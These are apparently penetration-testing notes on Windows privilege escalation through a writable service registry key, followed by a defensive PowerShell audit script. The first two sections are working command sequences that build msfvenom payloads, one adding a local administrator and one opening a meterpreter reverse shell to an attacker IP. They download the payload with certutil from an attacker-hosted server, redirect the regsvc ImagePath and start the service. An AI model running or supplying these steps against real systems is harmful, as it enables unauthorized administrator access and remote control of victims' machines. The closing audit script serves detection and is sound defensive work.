## Exploiting Insecure Service with Metasploit

- Create a binary that adds a user to the local Administrators group with msfvenom:

  ```
  msfvenom -p windows/x64/exec CMD='net localgroup Administrators [USERNAME] /add' -f exe > hackfast.exe
  ```

- Host the binary with a Python HTTP server and transfer it to the target machine with certutil (the next step expects it at `c:\temp\hackfast.exe`):

  ```
  certutil -urlcache -f http://[IP-ADDRESS]:8001/hackfast.exe hackfast.exe
  ```

- Change the `ImagePath` value on the `regsvc` service registry key to point to the malicious executable:

  ```
  reg add "HKLM\SYSTEM\CurrentControlSet\services\regsvc" /v ImagePath /t REG_EXPAND_SZ /d c:\temp\hackfast.exe /f
  ```

  Note: verify that `ImagePath` was set properly with the following command:

  ```
  reg query "HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\regsvc"
  ```

- Run `net start regsvc` on the target to execute the exploit.

  Note: if `SeShutdownPrivilege` is enabled, reboot to have the service restart automatically:

  ```
  shutdown /r /t 0
  ```
## Generating Reverse Shell with msfvenom

- Create a reverse shell binary with msfvenom:

  ```
  msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe LHOST=[ATTACKER-IP] LPORT=[PORT] -o hackfast.exe
  ```

- Host the binary with a Python HTTP server and transfer it to the target machine with certutil (the next step expects it at `c:\temp\hackfast.exe`):

  ```
  certutil -urlcache -f http://[IP-ADDRESS]:8001/hackfast.exe hackfast.exe
  ```

- Change the `ImagePath` value on the `regsvc` service registry key to point to the malicious executable:

  ```
  reg add "HKLM\SYSTEM\CurrentControlSet\services\regsvc" /v ImagePath /t REG_EXPAND_SZ /d c:\temp\hackfast.exe /f
  ```

  Note: verify that `ImagePath` was set properly with the following command:

  ```
  reg query "HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\regsvc"
  ```

- Start a listener on the attacking machine:

  ```
  msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT [PORT]; run"
  ```

- Run `net start regsvc` on the target machine to execute the exploit.

  Note: if `SeShutdownPrivilege` is enabled, reboot to have the service restart automatically:

  ```
  shutdown /r /t 0
  ```
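Both procedures above depend on the same two conditions: a service registry key that a low-privileged user can write, and an `ImagePath` that has been redirected to a binary outside the normal Windows locations. The following PowerShell audit, added here as a defender-side example and not part of the original notes, enumerates every service key and reports both conditions; the identity list, trusted roots and write-right mask are assumptions to tune per host, and it should be run elevated.

```powershell
# Added audit script (not from the original notes). Reports service keys that
# low-privileged principals can modify, and ImagePath values that point outside
# the trusted install roots (e.g. c:\temp\hackfast.exe).
# Assumptions: run as an administrator; identity names are the built-in defaults.
$lowPrivIdentities = @(
    'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone',
    'NT AUTHORITY\INTERACTIVE', 'NT AUTHORITY\ANONYMOUS LOGON'
)
# Any one of these rights on a service key is enough to rewrite ImagePath.
$writeRights = [System.Security.AccessControl.RegistryRights]::SetValue -bor
               [System.Security.AccessControl.RegistryRights]::WriteKey -bor
               [System.Security.AccessControl.RegistryRights]::FullControl -bor
               [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
               [System.Security.AccessControl.RegistryRights]::TakeOwnership
$trustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
    Where-Object { $_ } | ForEach-Object { "$_\" }

Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue | ForEach-Object {
    $key  = $_
    $name = $key.PSChildName
    try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { return }

    # Finding 1: a low-privileged principal holds a write-capable right on the key.
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivIdentities -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.RegistryRights -band [int]$writeRights) -ne 0) {
            [pscustomobject]@{ Service = $name; Finding = 'WritableServiceKey'
                               Detail = "$($ace.IdentityReference): $($ace.RegistryRights)" }
        }
    }

    # Finding 2: ImagePath resolves to a drive-letter path outside the trusted roots.
    # Relative and NT-style paths (\SystemRoot\..., system32\drivers\...) are skipped.
    $imagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
    if ($imagePath) {
        $expanded = [Environment]::ExpandEnvironmentVariables($imagePath).Trim('"')
        if ($expanded -match '^\\\?\?\\') { $expanded = $expanded.Substring(4) }
        $inTrusted = $false
        foreach ($root in $trustedRoots) {
            if ($expanded.StartsWith($root, 'OrdinalIgnoreCase')) { $inTrusted = $true }
        }
        if (-not $inTrusted -and $expanded -match '^[a-zA-Z]:\\') {
            [pscustomobject]@{ Service = $name; Finding = 'ImagePathOutsideTrustedRoots'; Detail = $expanded }
        }
    }
} | Format-Table -AutoSize
```

A `WritableServiceKey` finding is the permission defect that makes the `reg add` step possible and should be fixed by restoring the key's ACL; an `ImagePathOutsideTrustedRoots` finding on a key such as `regsvc` is the post-modification state the `reg query` step above confirms.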